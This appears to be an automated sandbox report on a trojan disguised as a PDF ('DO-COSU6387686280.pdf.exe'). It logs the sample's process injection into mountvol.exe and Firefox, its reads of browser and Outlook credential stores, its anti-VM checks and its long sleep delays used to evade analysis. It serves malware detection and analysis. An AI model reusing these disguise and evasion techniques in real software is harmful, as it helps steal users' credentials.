                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0178B970 appears 280 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0181F290 appears 105 times
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1445394826.000000000733A000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1429887077.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMOUNTVOL.EXEj% vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exeBinary or memory string: OriginalFilenameKbmA.exeF vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/13
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DO-COSU6387686280.pdf.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMutant created: NULL
                    Source: C:\Windows\SysWOW64\mountvol.exeFile created: C:\Users\user\AppData\Local\Temp\p1h163LmPJump to behavior
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DO-COSU6387686280.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1956819996.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: DO-COSU6387686280.pdf.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeProcess created: C:\Windows\SysWOW64\mountvol.exe "C:\Windows\SysWOW64\mountvol.exe"
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeProcess created: C:\Windows\SysWOW64\mountvol.exe "C:\Windows\SysWOW64\mountvol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mountvol.pdb source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnLuReulIds.exe, 00000005.00000002.3902761074.000000000073E000.00000002.00000001.01000000.0000000C.sdmp, EnLuReulIds.exe, 00000007.00000002.3902762226.000000000073E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: mountvol.pdbGCTL source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: DO-COSU6387686280.pdf.exe, DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: DO-COSU6387686280.pdf.exe, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 6.2.mountvol.exe.383cd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 7.2.EnLuReulIds.exe.2c5cd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 7.0.EnLuReulIds.exe.2c5cd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 11.2.firefox.exe.1befcd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0176225F pushad ; ret 3_2_017627F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017627FA pushad ; ret 3_2_017627F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017909AD push ecx; mov dword ptr [esp], ecx3_2_017909B6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0176283D push eax; iretd 3_2_01762858
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00414625 push ebp; ret 3_2_00414628
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A970 push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A91A push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A9BD push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041ABB6 push esi; iretd 3_2_0041ABB7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004032D0 push eax; ret 3_2_004032D2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040149C pushfd ; retf 3_2_0040149D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00401DDD push edx; retf 3_2_00401DE3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B225F pushad ; ret 6_2_030B27F9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B27FA pushad ; ret 6_2_030B27F9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E09AD push ecx; mov dword ptr [esp], ecx6_2_030E09B6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B283D push eax; iretd 6_2_030B2858
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B1366 push eax; iretd 6_2_030B1369
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A32587 push eax; iretd 6_2_02A32588
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C5DA push 0000003Fh; ret 6_2_02A3C5E2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3769D push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A376EA push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A37647 push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A378E3 push esi; iretd 6_2_02A378E4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0144 pushfd ; iretd 6_2_034C0146
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BC12E push 00000034h; iretd 6_2_034BC134
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0130 pushad ; retf 6_2_034C013B
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BF067 pushad ; retf 6_2_034BF069
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B50AF push esp; iretd 6_2_034B50B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B85BE push esi; iretd 6_2_034B85C4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0485 push ebx; ret 6_2_034C04B7
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B1A6E push 681173EFh; ret 6_2_034B1A73
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: section name: .text entropy: 7.988083531410528

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses an obfuscated file name to hide its real file extension (double extension)
                    Source: Possible double extension: pdf.exeStatic PE information: DO-COSU6387686280.pdf.exe
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: DO-COSU6387686280.pdf.exe PID: 352, type: MEMORYSTR
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 8E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 9E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E rdtsc 3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeWindow / User API: threadDelayed 2429Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeWindow / User API: threadDelayed 7544Jump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeAPI coverage: 0.6 %
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI coverage: 2.6 %
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe TID: 1296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep count: 2429 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep time: -4858000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep count: 7544 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep time: -15088000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -65000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -54000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -36000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mountvol.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C870 FindFirstFileW,FindNextFileW,FindClose,6_2_02A3C870
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: p1h163LmP.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
